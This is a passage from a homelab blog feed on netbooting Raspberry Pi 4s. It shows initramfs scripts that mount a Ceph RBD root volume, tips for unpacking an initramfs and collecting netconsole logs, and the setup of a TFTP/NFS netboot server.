</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -z <span style="color:#e6db74">&#34;</span>$dev<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span> ; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		echo <span style="color:#e6db74">&#34;ERROR: RBD could not be mapped&#34;</span>
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># loop until rbd mount succeeds</span>
</span></span><span style="display:flex;"><span>	rbd_mount_root_impl
</span></span><span style="display:flex;"><span>	rbd_mount_retry_count<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">while</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">${</span>rbd_mount_retry_count<span style="color:#e6db74">}</span> -lt <span style="color:#e6db74">${</span>delay<span style="color:#e6db74">}</span> <span style="color:#f92672">]</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>		<span style="color:#f92672">&amp;&amp;</span> ! chroot <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>rootmnt<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> test -x <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>init<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> ; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>		<span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_begin_msg <span style="color:#e6db74">&#34;Retrying rbd mount&#34;</span>
</span></span><span style="display:flex;"><span>		/bin/sleep <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>		rbd_mount_root_impl
</span></span><span style="display:flex;"><span>		rbd_mount_retry_count<span style="color:#f92672">=</span><span style="color:#66d9ef">$((</span> <span style="color:#e6db74">${</span>rbd_mount_retry_count<span style="color:#e6db74">}</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span> <span style="color:#66d9ef">))</span>
</span></span><span style="display:flex;"><span>		<span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_end_msg
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>To begin with, the <code>rbdroot</code> option is read from the kernel command line
and put into a variable. This variable will later be interpreted to provide the
necessary credentials and configs to get the right RBD volume from the Ceph
cluster.
An example value would be <code>rbdroot=10.86.5.105,10.86.5.102,10.86.5.104:AUTHX-USERNAME:AUTHX-PASSWORD:mypool:myvolume::_netdev,noatime</code>.</p>
<p>Next follows the loading of some necessary kernel modules which need to be available
on the initramfs.</p>
<p>Then follows the actual mounting. For Ceph RBD volumes, mounting happens in two
steps. The first one is to map the volume to the local host, which puts a device
file under <code>/dev</code>. Then follows the actual mounting just like any other disk,
depending only on the filesystem of the volume.</p>
<p>The first step, the mapping, is done in the <code>rbd_map_root_impl</code> function, which
looks as follows:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>rbd_map_root_impl<span style="color:#f92672">()</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>	configure_networking
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># get rbd root from dhcp</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;x</span><span style="color:#e6db74">${</span>RBDROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;xauto&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		RBDROOT<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>ROOTPATH<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	local mons user key pool image snap partition
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># rbdroot=&lt;mons&gt;:&lt;user&gt;:&lt;key&gt;:&lt;pool&gt;:&lt;image&gt;[@&lt;snapshot&gt;]:[&lt;partition&gt;]:[&lt;mountopts&gt;]</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>RBDROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		local i<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>		local OLD_IFS<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>IFS<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>		IFS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;:&#34;</span>
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">for</span> arg in <span style="color:#e6db74">${</span>RBDROOT<span style="color:#e6db74">}</span> ; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>			<span style="color:#66d9ef">case</span> <span style="color:#e6db74">${</span>i<span style="color:#e6db74">}</span> in
</span></span><span style="display:flex;"><span>				1<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>					mons<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>echo <span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span> | tr <span style="color:#e6db74">&#34;;&#34;</span> <span style="color:#e6db74">&#34;:&#34;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>					;;
</span></span><span style="display:flex;"><span>				2<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>					user<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>					;;
</span></span><span style="display:flex;"><span>				3<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>					key<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>					;;
</span></span><span style="display:flex;"><span>				4<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>					pool<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>					;;
</span></span><span style="display:flex;"><span>				5<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>					<span style="color:#75715e"># image contains an @, i.e. a snapshot</span>
</span></span><span style="display:flex;"><span>					<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">${</span>arg#*@*<span style="color:#e6db74">}</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span> <span style="color:#f92672">]</span> ; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>						image<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg%%@*<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>						snap<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg##*@<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>					<span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>						image<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>						snap<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>					<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>					;;
</span></span><span style="display:flex;"><span>				6<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>					partition<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>					;;
</span></span><span style="display:flex;"><span>				7<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>                    mountopts<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>                      ;;
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">esac</span>
</span></span><span style="display:flex;"><span>			i<span style="color:#f92672">=</span><span style="color:#66d9ef">$((</span><span style="color:#e6db74">${</span>i<span style="color:#e6db74">}</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span><span style="color:#66d9ef">))</span>
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>		IFS<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>OLD_IFS<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># the kernel will reject writes to add if add_single_major exists</span>
</span></span><span style="display:flex;"><span>	local rbd_bus
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -e /sys/bus/rbd/add_single_major <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		rbd_bus<span style="color:#f92672">=</span>/sys/bus/rbd/add_single_major
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">elif</span> <span style="color:#f92672">[</span> -e /sys/bus/rbd/add <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		rbd_bus<span style="color:#f92672">=</span>/sys/bus/rbd/add
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>		echo <span style="color:#e6db74">&#34;ERROR: /sys/bus/rbd/add does not exist&#34;</span>
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># tell the kernel rbd client to map the block device</span>
</span></span><span style="display:flex;"><span>	echo <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>mons<span style="color:#e6db74">}</span><span style="color:#e6db74"> name=</span><span style="color:#e6db74">${</span>user<span style="color:#e6db74">}</span><span style="color:#e6db74">,secret=</span><span style="color:#e6db74">${</span>key<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span><span style="color:#e6db74">${</span>pool<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span><span style="color:#e6db74">${</span>image<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span><span style="color:#e6db74">${</span>snap<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> &gt; <span style="color:#e6db74">${</span>rbd_bus<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># figure out where the block device appeared</span>
</span></span><span style="display:flex;"><span>	dev<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>ls /dev/rbd* | grep <span style="color:#e6db74">&#39;/dev/rbd[0-9]*$&#39;</span> | tail -n 1<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># add partition if set</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">${</span>partition<span style="color:#e6db74">}</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		dev<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>dev<span style="color:#e6db74">}</span>p<span style="color:#e6db74">${</span>partition<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>In the first part, the <code>rbdroot</code> kernel command line is parsed. Then follows the
mapping of the volume to the local host. Here, instead of adding the CLI tools of
Ceph with all of their dependencies to the initramfs, direct writing to the
RBD kernel module&rsquo;s <code>/sys/bus/rbd</code> file is done.
As the final mapping step, the new device is stored in the <code>dev</code> variable.</p>
<p>The last step of the process is the mount itself, which happens in the
<code>rbd_mount_root_impl</code> function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>rbd_mount_root_impl<span style="color:#f92672">()</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">${</span>readonly<span style="color:#e6db74">}</span> <span style="color:#f92672">=</span> y <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		roflag<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-r&#34;</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>		roflag<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-w&#34;</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> ! -z <span style="color:#e6db74">&#34;</span>$mountopts<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span> ; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		mountopts<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-o </span>$mountopts<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># get the root filesystem type if not set</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>ROOTFSTYPE<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		FSTYPE<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>get_fstype <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>dev<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>		FSTYPE<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>ROOTFSTYPE<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	rbd_premount
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># mount the fs</span>
</span></span><span style="display:flex;"><span>	modprobe <span style="color:#e6db74">${</span>FSTYPE<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>	echo <span style="color:#e6db74">&#34;EXECUTING: \&#34;mount -t </span><span style="color:#e6db74">${</span>FSTYPE<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span><span style="color:#e6db74">${</span>roflag<span style="color:#e6db74">}</span><span style="color:#e6db74">,</span><span style="color:#e6db74">${</span>mountopts<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span>$dev<span style="color:#e6db74"> </span><span style="color:#e6db74">${</span>rootmnt<span style="color:#e6db74">}</span><span style="color:#e6db74">\&#34;&#34;</span>
</span></span><span style="display:flex;"><span>	mount -t <span style="color:#e6db74">${</span>FSTYPE<span style="color:#e6db74">}</span> <span style="color:#e6db74">${</span>roflag<span style="color:#e6db74">}</span> <span style="color:#e6db74">${</span>mountopts<span style="color:#e6db74">}</span> $dev <span style="color:#e6db74">${</span>rootmnt<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>This function just determines the filesystem type and then executes a normal
mount call.</p>
<p>And with that, we are done. The RBD volume should now be mounted and ready
to be used as the root device for our host.</p>
<h1 id="debugging">Debugging</h1>
<p>So how to debug your initramfs? Let&rsquo;s start with where to find it. That should
be pretty simple: It&rsquo;s going to be in your <code>/boot</code> directory, right alongside
the kernel image.</p>
<h2 id="manipulating-an-initramfs">Manipulating an initramfs</h2>
<p>While constructing an initramfs, especially for netbooting outside the default
NFS option, it might be useful to be able to look at an initramfs&rsquo; content.</p>
<p>A good overview of how to unpack and repack an initramfs can be found in
<a href="https://backreference.org/2010/07/04/modifying-initrdinitramfs-files/">this blog article</a>.</p>
<p>First, figure out what compression the initramfs uses by running:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>file /path/to/initramfs
</span></span></code></pre></div><p>The following command will unpack an image:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>gunzip -c /path/to/initramfs | cpio -i
</span></span></code></pre></div><p>This works for a gzip compressed image. If you have, for example, a zstd
compressed image, just replace <code>gunzip -c</code> with <code>zstdcat</code>.</p>
<p>To repackage the image after making your changes, run the commands in reverse:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>find . | cpio -H newc -o | gzip -9 &gt; /path/for/new/image
</span></span></code></pre></div><h2 id="getting-logs-from-a-remote-boot">Getting logs from a remote boot</h2>
<p>One important question when debugging: How do I see the console output of the
initramfs scripting if I don&rsquo;t have a monitor connected to the machine?</p>
<p>This can be accomplished with the <code>netboot</code> kernel option and <code>netcat</code>.</p>
<p>The kernel docs for the netconsole feature can be found <a href="https://www.kernel.org/doc/Documentation/networking/netconsole.txt">here</a>.</p>
<p>An example <code>netconsole=</code> kernel command line parameter would look like this:</p>
<pre tabindex="0"><code>netconsole=4444@10.0.0.1/eth1,9353@10.0.0.2/12:34:56:78:9a:bc
</code></pre><p>The parameters are as follows:</p>
<ul>
<li><code>4444</code>: The source port to use for sending (port on the host producing the logs)</li>
<li><code>10.0.0.1</code>: IP of the host producing the logs</li>
<li><code>/eth1</code>: Name of the NIC to use (be aware that this might differ from the name in the booted system, as systemd/udev change the name for predictable NIC naming)</li>
<li><code>9353@10.0.0.2</code>: Target port and IP on the machine which is listening for the logs</li>
<li><code>/12:34:56:78:9a:bc</code>: MAC address of the listening machine (find this with <code>ip link</code>)</li>
</ul>
<p>On the receiver side, for the machine where you want to receive the logs,
you can use netcat: <code>nc -u -l &lt;port&gt;</code>, where <code>&lt;port&gt;</code> with the above example
<code>netconsole</code> line would be <code>9353</code>.</p>
<h1 id="closing">Closing</h1>
<p>I hope that with the above article, I was able to generate the same &ldquo;Huh, it&rsquo;s that
simple?&rdquo; reaction and delight that rummaging through the initramfs created for me.</p>
<p>The next and last article in this series will give a short overview on how to
create a HashiCorp Packer image and Ansible playbook for a netbooting Raspberry
Pi.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Netboot Raspberry Pi Part II: The Netboot Server</title>
      <link>https://blog.mei-home.net/posts/rpi-netboot/netboot-server/</link>
      <pubDate>Tue, 02 Aug 2022 00:11:09 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/rpi-netboot/netboot-server/</guid>
      <description>How Raspberry Pi netbooting works and how to set up a netboot server</description>
      <content:encoded><![CDATA[<p>In this article, I will provide an overview of how netbooting with the Raspberry
Pi 4 works and how to configure a server off of which you can boot your Pi.</p>
<p>Several components are needed for netbooting a Pi:</p>
<ul>
<li>The Pi itself needs to have netbooting in its boot order config</li>
<li>A DHCP server is needed to provide IPs for the Pi and the TFTP server. In this
series, the IP for the Pi will be provided by my OPNsense firewall and the
netboot options will be provided by DNSmasq.</li>
<li>A <a href="https://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol">TFTP</a> (<strong>T</strong>rivial <strong>F</strong>ile <strong>T</strong>ransfer <strong>P</strong>rotocol) server to provide the boot files</li>
</ul>
<h1 id="prerequisites">Prerequisites</h1>
<p>For this article, the following things are assumed to be present:</p>
<ul>
<li>A Raspberry Pi 4 you would like to netboot</li>
<li>A server which will serve as the netboot server. This can be another Pi or
any other server you have running in your Homelab.</li>
<li>A DHCP server</li>
<li>An NFS server</li>
</ul>
<h1 id="how-the-raspberry-pi-netboot-works">How the Raspberry Pi netboot works</h1>
<p>When a Raspberry Pi boots, it tries a configurable sequence of boot types and
uses the first one which works. The boot order is configured in the Pi
bootloader config. The documentation on all available boot options can be found
<a href="https://www.raspberrypi.com/documentation/computers/raspberry-pi.html#BOOT_ORDER">in the official docs</a>.</p>
<p>Interesting for us is the netboot option, <code>0x2</code>.</p>
<p>To change the bootloader config, you need to boot into an OS and run the
<code>rpi-eeprom-config</code> tool. As described in the <a href="https://www.raspberrypi.com/documentation/computers/raspberry-pi.html#raspberry-pi-4-bootloader-configuration">Pi docs</a>, you can run the following
command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>sudo -E rpi-eeprom-config --edit
</span></span></code></pre></div><p>This will pop up an editor with config looking like this:</p>
<pre tabindex="0"><code>[all]
BOOT_UART=0
WAKE_ON_GPIO=1
POWER_OFF_ON_HALT=0
BOOT_ORDER=0xf241
</code></pre><p>Please note: The <code>BOOT_ORDER</code> option might not be present in a fresh Pi. You can
simply add the line at the end.</p>
<p>One important point for the <code>BOOT_ORDER</code> variable: It is read from right to left,
not from left to right. So the boot order in the above example will try the
following options in order:</p>
<ol>
<li>SD card/eMMC boot (<code>0x1</code>)</li>
<li>USB boot (<code>0x4</code>)</li>
<li>Network boot (<code>0x2</code>)</li>
<li>Start again from 1) (<code>0xf</code>)</li>
</ol>
<p>I like the above <code>BOOT_ORDER</code> value because it allows me to short circuit the
boot to a USB stick or SD card if something is wrong with the netboot setup.
This setup has one caveat though: It&rsquo;s not usable for booting Pi CM4s with eMMC
storage. Because you can&rsquo;t actually remove the eMMC storage, the Pi would
always find the eMMC storage and boot off of it if there is a working image
on it. For CM4s, I would move the eMMC option to the very end of the sequence
or remove it completely and just rely on a USB stick when things go south with
netbooting.</p>
<p>The netboot itself roughly follows this order:</p>
<ol>
<li>Broadcast a DHCP request</li>
<li>Receive DHCP response and configure IP</li>
<li>Receive DHCP proxy response</li>
<li>Take TFTP server address from DHCP response</li>
<li>Contact TFTP server and check if <code>&lt;SERIAL&gt;/start.elf</code> can be found</li>
<li>If it can be found, request all further files from <code>&lt;SERIAL&gt;/</code></li>
<li>Otherwise, further files will be requested without a directory prefix</li>
<li>Start downloading boot configs, initramfs and the kernel</li>
</ol>
<p>This sequence can also be found in the <a href="https://www.raspberrypi.com/documentation/computers/raspberry-pi.html#network-booting">official documentation</a>.</p>
<p>The first interesting part to note is the <em>Receive DHCP proxy response</em> step.
Due to this, we can setup a separate DNSmasq server which only serves the
netboot relevant options, while leaving whatever main DHCP server you are using
undisturbed.</p>
<p>The second important part is about the <code>&lt;SERIAL&gt;</code> directory the Pi tries first.
This mechanism first checks whether the required files can be found in a
subdirectory on the netboot server corresponding to the Pi&rsquo;s serial number.
This way, we can supply separate kernels and configs for different Pis in the
network.
The serial number can be found with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>cat /proc/cpuinfo | grep Serial
</span></span><span style="display:flex;"><span>Serial		: 10000000bf9fed6f
</span></span></code></pre></div><p>The serial number the Pi checks during netboot to find device specific files
is the last part starting after the long string of zeroes. In this example, the
serial would be <code>bf9fed6f</code>.</p>
<h1 id="nfs-boot-dir">NFS boot dir</h1>
<p>So where are the kernel and all the other boot files coming from? The answer:
An NFS mount. This is due to the following problem: When running a system update
on a netbooting machine, how are the new kernel and dtbs going to find their
way to the TFTP server?
You could always go with just copying the files after the update,
but I believe just having the <code>/boot</code> directory on a NFS mount shared between
the netbooting Pi and the TFTP server makes system updates seamless.</p>
<p>So the first thing you need is an NFS server. For my setup, I&rsquo;m using
<a href="https://github.com/nfs-ganesha/nfs-ganesha">NFS Ganesha</a> deployed via my Ceph
cluster, backed by a CephFS volume. The documentation for setting that up can
be found <a href="https://docs.ceph.com/en/latest/mgr/nfs/">here</a>. But any NFS server
will do.</p>
<p>The following gives a brief overview of how to set up an NFS share on a Ceph
cluster.
To begin with, create a CephFS subvolume to back the NFS share.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph fs subvolume create homenet-fs picluster-boot
</span></span></code></pre></div><p>Here, <code>homenet-fs</code> is the name of my CephFS volume, while <code>picluster-boot</code>
is the name of the new subvolume.
Next, create the NFS Ganesha cluster itself, if you do not have an NFS cluster
yet:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph nfs cluster create hn-nfs <span style="color:#e6db74">&#34;nfs-host&#34;</span>
</span></span></code></pre></div><p>This will create a cluster called <code>hn-nfs</code> with an NFS Ganesha daemon being
automatically deployed (via <code>cephadm</code>) on the cluster host <code>nfs-host</code>.
Now, you can create the NFS export for the netboot boot files:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph nfs export create cephfs --cluster-id hn-nfs --pseudo-path /picluster-boot --fsname homenet-fs --path /cephfs/path/to/subvolume --client_addr 10.86.5.0/24
</span></span></code></pre></div><p>This command creates an NFS export reachable at <code>/picluster-boot</code>, using the
CephFS volume <code>picluster-boot</code> we created above for backing storage and
restricting access to my local cluster subnet.
To get the right parameter for the <code>--path</code> argument, you can use this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph fs subvolume getpath homenet-fs picluster-boot
</span></span><span style="display:flex;"><span>/cephs/path/to/subvolume
</span></span></code></pre></div><p>One important note on permissions. I had to configure NFS to squash all
access to the <code>nobody</code> user. This is due to the fact that Ubuntu installs the
kernel with permissions <code>600</code> and owner <code>root</code>. Consequently, the TFTP server
not running under <code>root</code> was not able to read the kernel when the Pi requested
it during netboot.</p>
<p>Another important note concerns bootstrapping your Homelab.
Think about where/how you provide the NFS server. Obviously, it should not
be located on a host which is netbooting itself. This also goes for putting
it into your k8s cluster if your cluster nodes, or any of the services your
cluster nodes need to come up, do netbooting.
In my setup, the Ceph cluster is a <em>no dependencies</em> setup. Meaning it can
always boot up without needing absolutely anything else from my Homelab. So
it&rsquo;s pretty save to run the NFS mount for the boot directories off of Ceph.</p>
<p>For the mounts themselves, I&rsquo;m mounting the full NFS netboot directory on the
TFTP server like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cfg" data-lang="cfg"><span style="display:flex;"><span><span style="color:#a6e22e">nfs-host:/picluster-boot /mnt/netboot nfs defaults,timeo</span><span style="color:#f92672">=</span><span style="color:#e6db74">900,_netdev 0 0</span>
</span></span></code></pre></div><p>This mounts the <code>picluster-boot</code> NFS export at <code>/mnt/netboot</code>. Again, note
that I&rsquo;m using <code>nfs-host</code>, namely a hostname instead of an IP. This means,
for netbooting to work, I need working DNS because otherwise, my TFTP server
is not going to be able to access the boot files. So don&rsquo;t make your local DNS
dependent on a netbooted machine.</p>
<p>On the Pi itself, the <code>/boot</code> directory would be mounted like this in
<code>/etc/fstab</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cfg" data-lang="cfg"><span style="display:flex;"><span><span style="color:#a6e22e">nfs-host:/picluster-boot/bf9fed6f /boot/firmware nfs defaults,timeo</span><span style="color:#f92672">=</span><span style="color:#e6db74">900,_netdev 0 0</span>
